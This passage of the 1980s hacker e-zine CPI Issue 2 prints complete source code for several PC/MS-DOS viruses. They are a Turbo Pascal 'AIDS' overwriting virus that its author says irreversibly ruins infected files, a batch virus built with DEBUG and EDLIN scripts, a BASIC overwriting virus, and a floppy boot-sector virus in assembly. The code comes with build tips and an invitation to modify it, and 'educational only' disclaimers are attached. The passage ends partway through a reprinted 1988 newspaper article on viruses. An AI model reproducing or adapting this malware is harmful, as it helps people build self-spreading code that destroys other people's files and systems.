;| (old path) + + +Subject: CPI Issue 2 6/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.6] + +-------------------------------+ +--------------------------------------+ + | | P | | + | @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### | + | @@ @@ @@ @@ | R | # # # # # # | + | @@ @@ @@ @@ | * | ##### # # # ##### | + | @@ @@@@@@@@ @@ | E | # # # # # # | + | @@ @@ @@ | * | # # ##### #### ##### | + | @@ @@ @@ | S | | + | @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+ + | | E | A NEW AND IMPROVED VIRUS FOR | + +-------------------------------+ * | PC/MS DOS MACHINES | + | C O R R U P T E D | N +--------------------------------------+ + | | * | CREATED BY: DOCTOR DISSECTOR | + | P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY| + | | * | AUTHOR NOT RESPONSIBLE FOR READERS | + | I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS| + +-------------------------------+ +--------------------------------------+ + + Well well, here it is... I call it AIDS... It infects all COM files, but it is + not perfect, so it will also change the date/time stamp to the current system. + Plus, any READ-ONLY attributes will ward this virus off, it doesnYt like them! + + Anyway, this virus was originally named NUMBER ONE, and I modified the code so + that it would fit my needs. The source code, which is included with this neato + package was written in Turbo Pascal 3.01a. Yeah I know itYs old, but it works. + + Well, I added a few things, you can experiment or mess around with it if youYd + like to, and add any mods to it that you want, but change the name and give us + some credit if you do. + + The file is approximately 13k long, and this extra memory will be added to the + file it picks as host. 
If no more COM files are to be found, it picks a random + value from 1-10, and if it happens to be the lucky number 7, AIDS will present + a nice screen with lots of smiles, with a note telling the operator that their + system is now screwed, I mean permanantly. The files encrypted containing AIDS + in their code are IRREVERSIBLY messed up. Oh well... + + Again, neither CPI nor the author of Number One or AIDS endorses this document + and program for use in any illegal manner. Also, CPI, the author to Number One + and AIDS is not responsible for any actions by the readers that may prove harm + in any way or another. This package was written for EDUCATIONAL purposes only! + +{ Beginning of source code, Turbo Pascal 3.01a } +{C-} +{U-} +{I-} { Wont allow a user break, enable IO check } + +{ -- Constants --------------------------------------- } + +Const + VirusSize = 13847; { AIDSYs code size } + + Warning :String[42] { Warning message } + = ZThis File Has Been Infected By AIDS! HaHa!Y; + +{ -- Type declarations------------------------------------- } + +Type + DTARec =Record { Data area for file search } + DOSnext :Array[1..21] of Byte; + Attr : Byte; + Ftime, + FDate, + FLsize, + FHsize : Integer; + FullName: Array[1..13] of Char; + End; + +Registers = Record {Register set used for file search } + Case Byte of + 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); + 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); + End; + +{ -- Variables--------------------------------------------- } + +Var + { Memory offset program code } + ProgramStart : Byte absolute Cseg:$100; + { Infected marker } + MarkInfected : String[42] absolute Cseg:$180; + Reg : Registers; { Register set } + DTA : DTARec; { Data area } + Buffer : Array[Byte] of Byte; { Data buffer } + TestID : String[42]; { To recognize infected files } + UsePath : String[66]; { Path to search files } + { Lenght of search path } + UsePathLenght: Byte absolute UsePath; + Go : File; { File to infect } + B : Byte; { Used } + LoopVar : 
Integer; {Will loop forever} + +{ -- Program code------------------------------------------ } + +Begin + GetDir(0, UsePath); { get current directory } + if Pos(Z\Y, UsePath) <> UsePathLenght then + UsePath := UsePath + Z\Y; + UsePath := UsePath + Z*.COMY; { Define search mask } + Reg.AH := $1A; { Set data area } + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } + Reg.AH := $4E; + Reg.DS := Seg(UsePath); + Reg.DX := Ofs(UsePath[1]); + Reg.CX := $ff; { Set attribute to find ALL files } + MsDos(Reg); { Find first matching entry } + IF not Odd(Reg.Flags) Then { If a file found then } + Repeat + UsePath := DTA.FullName; + B := Pos(#0, UsePath); + If B > 0 then + Delete(UsePath, B, 255); { Remove garbage } + Assign(Go, UsePath); + Reset(Go); + If IOresult = 0 Then { If not IO error then } + Begin + BlockRead(Go, Buffer, 2); + Move(Buffer[$80], TestID, 43); + { Test if file already ill(Infected) } + If TestID <> Warning Then { If not then ... } + Begin + Seek (Go, 0); + { Mark file as infected and .. } + MarkInfected := Warning; + { Infect it } + BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); + Close(Go); + Halt; {.. and halt the program } + End; + Close(Go); + End; + { The file has already been infected, search next. } + Reg.AH := $4F; + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + { ......................Until no more files are found } + Until Odd(Reg.Flags); +Loopvar:=Random(10); +If Loopvar=7 then +begin + Writeln(Z + + + + + + + + +Y); {Give a lot of smiles} +Writeln(ZY); +Writeln(Z Y); +Writeln(Z ATTENTION: + Y); +Writeln(Z I have been elected to inform you that throughout your process of + Y); +Writeln(Z collecting and executing files, you have accidentally HK? Y +); +Writeln(Z yourself over; again, thatYZs PHUCKED yourself over. No, it canno +t Y); +Writeln(Z be; YES, it CAN be, a wDs has infected your system. Now what do + Y); +Writeln(Z you have to say about that? HAHAHAHA. 
Have H with this one and +Y); +Writeln(Z remember, there is NO cure for + Y); +Writeln(Z + Y); +Writeln(Z 7777777777 777777777777 77777777777 7777777777 + Y); +Writeln(Z 777777 77 77777 77777 + Y); +Writeln(Z 77 77 77 77 77 77  + Y); +Writeln(Z 77 77 77 77 77 77 + Y); +Writeln(Z 777777777777 77 77 77 777777777777 + Y); +Writeln(Z 7777 77 77 77 77 + Y); +Writeln(Z 77 77 77 77 77 77 + Y); +Writeln(Z 77 77 77 77 777 77 777 + Y); +Writeln(Z 77 77 777777777777 77777777777 7777777777 + Y); +Writeln(Z      + Y); +Writeln(Z + Y); +Writeln(Z Y); +REPEAT +LOOPVAR:=0; +UNTIL LOOPVAR=1; +end; +End. + +{ Although this is a primitive virus its effective. } +{ In this virus only the .COM } +{ files are infected. Its about 13K and it will } +{ change the date entry. } + + +Subject: CPI Issue 2 7/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.7] + + Batch Viruses + ------------- + + +Whoever thought that viruses could be in BATCH file.This virus which we + +are about to see makes use of MS-DOS operating system. This BATCH virus +uses DEBUG & EDLIN programs. + +Name: VR.BAT + +echo = off ( Self explanatory) +ctty nul ( This is important. Console output is turned off) +path c:\msdos ( May differ on other systems ) +dir *.com/w>ind ( The directory is written on oind@ ONLY name entries) + +edlin ind<1 ( oInd@ is processed with EDLIN so only file names appear) +debug ind<2 ( New batch program is created with debug) +edlin name.bat<3 ( This batch goes to an executable form because of EDLIN) +ctty con ( Console interface is again assigned) +name ( Newly created NAME.BAT is called. 
+ + +In addition to file to this Batch file,there command files,here named 1,2,3 + +Here is the first command file: +------------------------------- +Name: 1 + +1,4d ( Here line 1-4 of the oIND@ file are deleted ) +e ( Save file ) + +Here is the second command file: +-------------------------------- +Name: 2 + +m100,10b,f000 (First program name is moved to the F000H address to save) + +e108 o.BAT@ (Extention of file name is changed to .BAT) +m100,10b,f010 (File is saved again) +e100@DEL o (DEL command is written to address 100H) +mf000,f00b,104 (Original file is written after this command) +e10c 2e (Period is placed in from of extension) +e110 0d,0a (Carrige return+ line feed) +mf010,f020,11f ( Modified file is moved to 11FH address from buffer area) +e112 oCOPY \VR.BAT@ ( COPY command is now placed in front of file) +e12b od,0a (COPY command terminated with carriage return + lf) +rxc ( The CX register is ... ) +2c ( set to 2CH) +nname.bat ( Name it NAME.BAT) +w ( Write ) +q ( quit ) + + +The third command file must be printed as a hex dump because it contains +2 control characters (1Ah=Control Z) and this is not entirely printable. + +Hex dump of the third command file: +----------------------------------- +Name: 3 + +0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 + 1 , 1 ? . . n y y y y y y y +0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79 + y . 2 , ? ? r . . n n y y y +0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00 + y y y y . E . . . . . . . . . + + +In order for this virus to work VR.BAT should be in the root. This program +only affects .COM files. + + +Subject: CPI Issue 2 8/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.8] + + Viruses in Basic + ---------------- + + +Basic is great language and often people think of it as a limited language +and will not be of any use in creating something like a virus. Well you are +really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987. 
+This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE +files.To do this you must compile the source code using a the Microsoft +Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit +the source code to place the lenght of the object program in the LENGHTVIR +variable. BV3.EXE should be in the current directory, COMMAND.COM must be +available, the LENGHTVIR variable must be set to the lenght of the linked + +program and remember to use /e parameter when compiling. + + + +10 REM ** DEMO +20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED ** +30 REM ** BASIC DOESNT SUCK +40 REM ** NO KIDDING +50 ON ERROR GOTO 670 +60 REM *** LENGHTVIR MUST BE SET ** +70 REM *** TO THE LENGHT TO THE ** +80 REM *** LINKED PROGRAM *** +90 LENGHTVIR=2641 +100 VIRROOT$=@BV3.EXE@ +110 REM *** WRITE THE DIRECTORY IN THE FILE oINH@ +130 SHELL oDIR *.EXE>INH@ +140 REM ** OPEN oINH@ FILE AND READ NAMES ** +150 OPEN oR@,1,@INH@,32000 +160 GET #1,1 +170 LINE INPUT#1,ORIGINAL$ +180 LINE INPUT#1,ORIGINAL$ +190 LINE INPUT#1,ORIGINAL$ +200 LINE INPUT#1,ORIGINAL$ +210 ON ERROR GOT 670 +220 CLOSE#2 +230 F=1:LINE INPUT#1,ORIGINAL$ +240 REM ** o%@ IS THE MARKER OF THE BV3 +250 REM ** o%@ IN THE NAME MEANS +260 REM ** INFECTED COPY PRESENT +270 IF MID$(ORIGINAL$,1,1)=@%@ THEN GOTO 210 +280 ORIGINAL$=MID$(ORIGINAL$,1,13) +290 EXTENSIONS$=MID$(ORIGINAL,9,13) +300 MID$(EXTENSIONS$,1,1)=@.@ +310 REM *** CONCATENATE NAMES INTO FILENAMES ** +320 F=F+1 +330 IF MID$(ORIGINAL$,F,1)=@ o OR MID$ (ORIGINAL$,F,1)=@.@ OR F=13 THEN +GOTO 350 +340 GOTO 320 +350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$ +360 ON ERROR GOTO 210 +365 TEST$=@o +370 REM ++ OPEN FILE FOUND +++ +380 OPEN oR@,2,OROGINAL$,LENGHTVIR +390 IF LOF(2) < LENGHTVIR THEN GOTO 420 +400 GET #2,2 +410 LINE INPUT#1,TEST$ +420 CLOSE#2 +431 REM ++ CHECK IF PROGRAM IS ILL ++ +440 REM ++ o%@ AT THE END OF THE FILE MEANS.. 
+450 REM ++ FILE IS ALREADY SICK ++ +460 REM IF MID$(TEST,2,1)=@%@ THEN GOTO 210 +470 CLOSE#1 +480 ORIGINALS$=ORIGINAL$ +490 MID$(ORIGINALS$,1,1)=@%@ +499 REM ++++ SANE oHEALTHY@ PROGRAM ++++ +510 C$=@COPY o+ORIGINAL$+@ o+ORIGINALS$ +520 SHELL C$ +530 REM *** COPY VIRUS TO HEALTHY PROGRAM **** +540 C$=@COPY o+VIRROOT$+ORIGINAL$ +550 SHELL C$ +560 REM *** APPEND VIRUS MARKER *** +570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13 +580 WRITE#1,ORIGINALS$ +590 CLOSE#1 +630 REM ++ OUYPUT MESSAGE ++ +640 PRINT oINFECTION IN o ;ORIGIANAL$; o !! BE WARE !!@ +650 SYSTEM +660 REM ** VIRUS ERROR MESSAGE +670 PRINT oVIRUS INTERNAL ERROR GOTTCHA !!!!@:SYSTEM +680 END + + +This basic virus will only attack .EXE files. After the execution you will +see a oINH@ file which contains the directory, and the file %SORT.EXE. +Programs which start with o%@ are NOT infected ,they pose as back up copies. + + +Subject: CPI Issue 2 9/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +;[2.9] +;-----------------------------------------------------------------------; +; This virus is of the oFLOPPY ONLY@ variety. ; +; It replicates to the boot sector of a floppy disk and when it gains control +; it will move itself to upper memory. It redirects the keyboard ; +; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; +; it will attempt to infect any floppy it finds in drive A:. ; +; It keeps the real boot sector at track 39, sector 8, head 0 ; +; It does not map this sector bad in the fat (unlike the Pakistani Brain) +; and should that area be used by a file, the virus ; +; will die. It also contains no anti detection mechanisms as does the ; +; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; +; sector 9 because this is common to all floppy formats both single ; +; sided and double sided. It does not contain any malevolent TROJAN ; +; HORSE code. 
It does appear to contain a count of how many times it ; +; has infected other diskettes although this is harmless and the count ; +; is never accessed. ; +; ; +; Things to note about this virus: ; +; It can not only live through an ALT-CTRL-DEL reboot command, but this ; +; is its primary (only for that matter) means of reproduction to other ; +; floppy diskettes. The only way to remove it from an infected system ; +; is to turn the machine off and reboot an uninfected copy of DOS. ; +; It is even resident when no floppy is booted but BASIC is loaded ; +; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; +; it activates and infectes the floppy from which the user is ; +; attempting to boot. ; +; ; +; Also note that because of the POP CS command to pass control to ; +; its self in upper memory, this virus does not to work on 80286 ; +; machines (because this is not a valid 80286 instruction). ; +; ; +; If your assembler will not allow the POP CS command to execute, replace; +; the POP CS command with an NOP and then assemble it, then debug that ; +; part of the code and place POP CS in place of NOP at that section. ; +; ; +; The Norton Utilities can be used to identify infected diskettes by ; +; looking at the boot sector and the DOS SYS utility can be used to ; +; remove it (unlike the Pakistani Brain). ; +;-----------------------------------------------------------------------; + ; + ORG 7C00H ; + ; +TOS LABEL WORD ;TOP OF STACK +;-----------------------------------------------------------------------; +; 1. Find top of memory and copy ourself up there. (keeping same offset); +; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; +; 3. Redirect int 9 (keyboard) to ourself in top of memory ; +; 4. Jump to ourself at top of memory ; +; 5. 
Load and execute REAL boot sector from track 40, head 0, sector 8 ; +;-----------------------------------------------------------------------; +BEGIN: CLI ;INITIALIZE STACK + XOR AX,AX ; + MOV SS,AX ; + MOV SP,offset TOS ; + STI ; + ; + MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) + MOV DS,BX ; + MOV AX,[0013H] ; + MUL BX ; + SUB AX,07E0H ; (7C00H+512)/16 + MOV ES,AX ; + ; + PUSH CS ;DS = CS + POP DS ; + ; + CMP DI,3456H ;IF THE VIRUS IS REBOOTING... + JNE B_10 ; + DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- + ; +B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY + MOV DI,SI ; + MOV CX,512 ; + CLD ; + REP MOVSB ; + ; + MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO + MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE + MOV CX,128 ; + REP MOVSB ; + ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + ; + PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH + POP CS + ; + PUSH DS ;DS=0 ; ES = DS + POP ES ; + ; + MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 + MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 + MOV CX,2708H ; TRACK 40, SECTOR 8 + MOV AX,0201H ; READ SECTOR + INT 13H ; (common to 8/9 sect. 1/2 sided!) + JB $ ; HANG IF ERROR + ; + JMP JMP_BOOT ;JMP 0000:7C00 + ; +;-----------------------------------------------------------------------; +; SAVE THEN REDIRECT INT 9 VECTOR ; +; ; +; ON ENTRY: DS = 0 ; +; ES = WHERE TO SAVE OLD_09 & (HI) ; +; WHERE NEW_09 IS (HI) ; +;-----------------------------------------------------------------------; +PUT_NEW_09: ; + DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 + ; + MOV SI,9*4 ;COPY INT 9 VECTOR TO + MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) 
+ MOV CX,0004 ; + ; + CLI ; + REP MOVSB ; + MOV Word Ptr [9*4],offset NEW_09 + MOV [(9*4)+2],ES ; + STI ; + ; + RET ; + ; +;-----------------------------------------------------------------------; +; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; +;-----------------------------------------------------------------------; +ACK_KEYBD: ; + IN AL,61H ;RESET KEYBOARD THEN CONTINUE + MOV AH,AL ; + OR AL,80H ; + OUT 61H,AL ; + XCHG AL,AH ; + OUT 61H,AL ; + JMP RBOOT ; + ; +;-----------------------------------------------------------------------; +; DATA AREA WHICH IS NOT USED IN THIS VERSION ; +; REASON UNKNOWN ; +;-----------------------------------------------------------------------; +TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 + DB 27H,0,2,2 ; (CURRENTLY NOT USED) + DB 27H,0,3,2 ; + DB 27H,0,4,2 ; + DB 27H,0,5,2 ; + DB 27H,0,6,2 ; + DB 27H,0,7,2 ; + DB 27H,0,8,2 ; + ; +;A7C9A LABEL BYTE ; + DW 00024H ;NOT USED + DB 0ADH ; + DB 07CH ; + DB 0A3H ; + DW 00026H ; + ; +;L7CA1: ; + POP CX ;NOT USED + POP DI ; + POP SI ; + POP ES ; + POP DS ; + POP AX ; + POPF ; + JMP 1111:1111 ; + ; +;-----------------------------------------------------------------------; +; IF ALT & CTRL & DEL THEN ... ; +; IF ALT & CTRL & ? THEN ... ; +;-----------------------------------------------------------------------; +NEW_09: PUSHF ; + STI ; + ; + PUSH AX ; + PUSH BX ; + PUSH DS ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME + IN AL,60H ;GET SCAN CODE + MOV AH,AL ;SAVE IN AH + AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH + ; + CMP AL,1DH ;IS IT A [CTRL]... + JNE N09_10 ;...JUMP IF NO + MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) + JMP N09_30 ; + ; +N09_10: CMP AL,38H ;IS IT AN [ALT]... + JNE N09_20 ;...JUMP IF NO + MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) + JMP N09_30 ; + ; +N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... + JNE N09_30 ;...JUMP IF NO + ; + CMP AL,17H ;IF [I]... + JE N09_X0 ;...JUMP IF YES + CMP AL,53H ;IF [DEL]... 
+ JE ACK_KEYBD ;...JUMP IF YES + ; +N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME + ; +N09_90: POP DS ; + POP BX ; + POP AX ; + POPF ; + ; + DB 0EAH ;JMP F000:E987 +OLD_09 DW ? ; + DW 0F000H ; + ; +N09_X0: JMP N09_X1 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? + MOV AX,0800H ;AL=0, AH=DELAY ARG + OUT DX,AL ; + CALL DELAY ; + MOV [ALT_CTRL],AX ;AX=0 ; + ; + MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR + INT 10H ; + MOV AH,2 ;SET CURSOR POS 0,0 + XOR DX,DX ; + MOV BH,DH ; PAGE 0 + INT 10H ; + ; + MOV AH,1 ;SET CURSOR TYPE + MOV CX,0607H ; + INT 10H ; + ; + MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) + CALL DELAY ; + ; + CLI ; + OUT 20H,AL ;SEND EOI TO INT CONTROLLER + ; + MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS + MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) + MOV SI,offset BEGIN - 128 ; + MOV CX,128 ; + CLD ; + REP MOVSB ; + ; + MOV DS,CX ;CX=0 ;DS=0 + ; + MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR + MOV [(19H*4)+2],CS ; + ; + MOV AX,0040H ;DS = ROM DATA AREA + MOV DS,AX ; + ; + MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 + INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) + ; + PUSH DS ;IF BIOS F000:E502 == 21E4... + MOV AX,0F000H ; + MOV DS,AX ; + CMP Word Ptr [0E502H],21E4H ; + POP DS ; + JE R_90 ; + INT 19H ; IF NOT...REBOOT + ; +R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! + ; +;-----------------------------------------------------------------------; +; REBOOT INT VECTOR ; +;-----------------------------------------------------------------------; +NEW_19: XOR AX,AX ; + ; + MOV DS,AX ;DS=0 + MOV AX,[0410] ;AX=EQUIP FLAG + TEST AL,1 ;IF FLOPPY DRIVES ... 
+ JNZ N19_20 ;...JUMP +N19_10: PUSH CS ;ELSE ES=CS + POP ES ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + INT 18H ;LOAD BASIC + ; +N19_20: MOV CX,0004 ;RETRY COUNT = 4 + ; +N19_22: PUSH CX ; + MOV AH,00 ;RESET DISK + INT 13 ; + JB N19_81 ; + MOV AX,0201 ;READ BOOT SECTOR + PUSH DS ; + POP ES ; + MOV BX,offset BEGIN ; + MOV CX,1 ;TRACK 0, SECTOR 1 + INT 13H ; +N19_81: POP CX ; + JNB N19_90 ; + LOOP N19_22 ; + JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC + ; +;-----------------------------------------------------------------------; +; Reinfection segment. ; +;-----------------------------------------------------------------------; +N19_90: CMP DI,3456 ;IF NOT FLAG SET... + JNZ RE_INFECT ;...RE INFECT + ; +JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR + JMP 0000:7C00H ; + ; +;-----------------------------------------------------------------------; +; Reinfection Segment. ; +;-----------------------------------------------------------------------; +RE_INFECT: ; + MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH + MOV CX,00E6H ; OURSELF + MOV DI,SI ; + PUSH CS ; + POP ES ; + CLD ; + REPE CMPSB ; + JE RI_12 ;IF NOT EQUAL... + ; + INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) + ; +;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; + MOV BX,offset TABLE ;FORMAT INFO + MOV DX,0000 ;DRIVE A: HEAD 0 + MOV CH,40-1 ;TRACK 39 + MOV AH,5 ;FORMAT + JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! + ; +; <<< NO EXECUTION PATH TO HERE >>> ; + JB RI_80 ; + ; +;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 +RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 + MOV BX,offset BEGIN ;TRACK 40H + MOV CL,8 ;SECTOR 8 + MOV AX,0301H ;WRITE 1 SECTOR + INT 13H ; + ; + PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) + POP ES ; + JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE + ; + MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! + MOV AX,0301 ; + INT 13H ; + JB RI_80 ; IF ERROR...JUMP TO BOOT CODE + ; +RI_12: MOV DI,3456H ;SET oJUST INFECTED ANOTHER ONE@... 
+ INT 19H ;...FLAG AND REBOOT + ; +RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) + JMP JMP_BOOT ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS + ; + MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG + MOV BX,0040H ; + MOV DS,BX ; + MOV [0072H],AX ; 0040:0072 = RESET FLAG + JMP N09_90 ; + ; +;-----------------------------------------------------------------------; +; DELAY ; +; ; +; ON ENTRY AH:CX = LOOP COUNT ; +;-----------------------------------------------------------------------; +DELAY: SUB CX,CX ; +D_01: LOOP $ ; + SUB AH,1 ; + JNZ D_01 ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A7DF4 DB 27H,00H,8,2 + +COUNTER_1 DW 001CH +ALT_CTRL DW 0 +A7DFC DB 27H,0,8,2 + + +Subject: CPI Issue 2 10/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.10] + + Virili In The News + ------------------ + This section deals with a large amount of stuff, basically, a bunch + of viruses and stuff that have been in the newspapers and magazines cuz + all of the damage they have done. Enjoy.... + + + ThereYs A Virus In My Software + + Mischief-makers at the computer + are deliberately endangering data + + By Philip J. Hilts + + Washington Post Staff Writer + + The Washington Post Weekly Edition, Page #38. May 23-29, 1988. + + Tiny programs that are deliberately cause mischief are epidemic among +computers and causing nervousness among those who monitor them. 
Since the +first tests of the notion in 1983 that machines can catch and spread +oinformation diseases,@ the computer world has reached the point at which as +many as thirty instances of ocomputer virus@ have been reported in the past +year, affecting tens of thousands of U.S. computers alone. + + Such viruses have been found at the National Aeronautics and Space +Administration, International Business Machines Corporation, the House of +Representatives, at least six universities, several major computer networks +such as Comp-u-serve and several businesses, including the worldYs largest +computer-service company, the $4.4 billion Electronic Data Systems +Corporation of Dallas, Texas. + + Written by malicious programmers, the viruses are sneaked into computer +systems by piggybacking them on legitimate programs and messages. There, +they may be passed along or instructed to wait until a prearranged moment to +burst forth and destroy data. + + Hundreds of computers at the Hebrew University of Jerusalem and other +places in Israel were hit last fall by a virus designed to spread and then, +in one swipe on a Friday the thirteenth, destroy all data in any computer it +could reach. + + If not for an error by itYs author, who has not been caught, the virus +could have caused devastation among micro-computers in Israel and other +nations. The virus did not check to see whether it already had infected a +program and so infected some computers hundreds of times, crowding their +memories enough to call attention to itself. + + In a seven-month campaign, programmers in Israel hastened to find +infected machines and ensure that the smallest number would be affected +before Friday, May 13th. Officials say they initially thought that the +infection was connected with the anniversary of the last day that Palestine +existed as a political entity but subsequently decided that it most likely +involved just Friday the thirteenth. 
+ + Apparently, the campaign was successful; there has been no word of +substantial damage. This past Friday the thirteenth is this yearYs only such +day. + + At the Aldus Corporation of Seattle, Washington, a major software maker, +executives are huddling with lawyers to try to determine whether +international spread of such diseases is illegal. No virus cases have been +taken to court. + + At N.A.S.A. headquarters in Washington, several hundred computers had to +be resuscitated after being infected. N.A.S.A. officials have taken +precautions and reminded their machinesY users to follow routine computer +hygiene: DonYt trust foreign data or strange machines. + + Viruses have the eerie ability to perch disguised among legitimate data +just as biological viruses hide among genes in human cells, then spring out +unexpectedly, multiplying and causing damage. Experts say that even when +they try to study viruses in controlled conditions, the programs can get out +of control and erase everything in a computer. The viruses can be virtually +impossible to stop if their creators are determined enough. + + oThe only way to protect every-body from them is to do something much +worse than the viruses: Stop talking to one another with computers,@ says +William H. Murray, an information-security specialist at Ernst and Whinney +financial consultants in Hartford, Connecticut. + + Hundreds of programs and files have been destroyed by viruses, and +thousands of hours of repair or prevention time have been logged. +Programmers have quickly produced antidote programs with such titles as +oVaccine,@ oFlu Shot,@ oData Physician,@ oSyringe.@ + + Experts says known damage is minimal compared with the huge, destructive +potential. They express the hope that the attacks will persuade computer +users to minimize access to programming and data. + + oWhat we are dealing with here is the fabric of trust in society,@ says +Murray. 
oWith computer viruses, we have a big vulnerability.@ + + Early this year, Aldus Corporation discovered that a virus had been +introduced that infected at least five-thousand copies of a new drawing +program called Freehand for the Macintosh computer. The infected copies were +packaged, sent to stores and sold. On March 2, the virus interrupted users +by flashing this message on their screens: + + oRichard Brandow, publisher of MacMag, and its entire staff would like +to take this opportunity to convey their universal message of peace to all +Macintosh users around the world.@ + + Viruses are the newest of evolving methods of computer mayhem, says +Donn B. Parker, a consultant at SRI International, a computer research firm +in Menlo Park, California. One is the oTrojan horse,@ a program that looks +and acts like a normal program but contains hidden commands that eventually +take effect, ordering mischief. Others include the otime bomb,@ which +explodes at a set time, and the ologic bomb,@ which goes off when the +computer arrives at a certain result during normal computation. The osalami +attack@ executes barely noticeable results small acts, such as shaving a +penny from thousands of accounts. + + The computer virus has the capability to command the computer to make +copies of the virus and spread them. A virus typically is written only as a +few hundred characters in a program containing tens of thousands of +characters. When the computer reads legitimate instructions, it encounters +the virus, which instructs the computer to suspend normal operations for a +fraction of a second. + + During that time, the virus instructs the computer to check for other +copies of itself and, if none is found, to make and hide copies. Instruction +to commit damage may be included. A few infamous viruses found in the past +year include: + +[] The oscores@ virus. Named after a file it spawns, it recently entered + several hundred Macintosh computers at N.A.S.A. headquarters. 
oIt looks + as if it searching for a particular Macintosh program with a name that + no one recognizes,@ spokesman Charles Redmond says. + + This virus, still spreading, has reached computers in CongressY + information system at the National Oceanic and Atmospheric + Administration and at Apple Computer IncorporatedYs government-systems + office in Reston, Virginia. It has hit individuals, businesses and + computer obulletin boards@ where computer hobbyists share information. + It apparently originated in Dallas, Texas and has caused damage, but + seemingly only because of its clumsiness, not an instruction to do + damage. + +[] The obrain@ virus. Named by its authors, it was written by two brothers + in a computer store in Lahore, Pakistan, who put their names, addresses + and phone number in the virus. Like oscores,@ it has caused damage + inadvertently, ordering the computer to copy itself into space that + already contain information. + +[] The oChristmas@ virus. It struck last December after a West German + student sent friends a Christmas message through a local computer + network. The virus told the receiverYs computer to display the + greeting, then secretly send the virus and message to everyone on the + recipientYs regular electronic mailing list. + + The student apparently had no idea that someone on the list had + special, restricted access to a major world-wide network of several + thousand computers run by I.B.M. The network broke 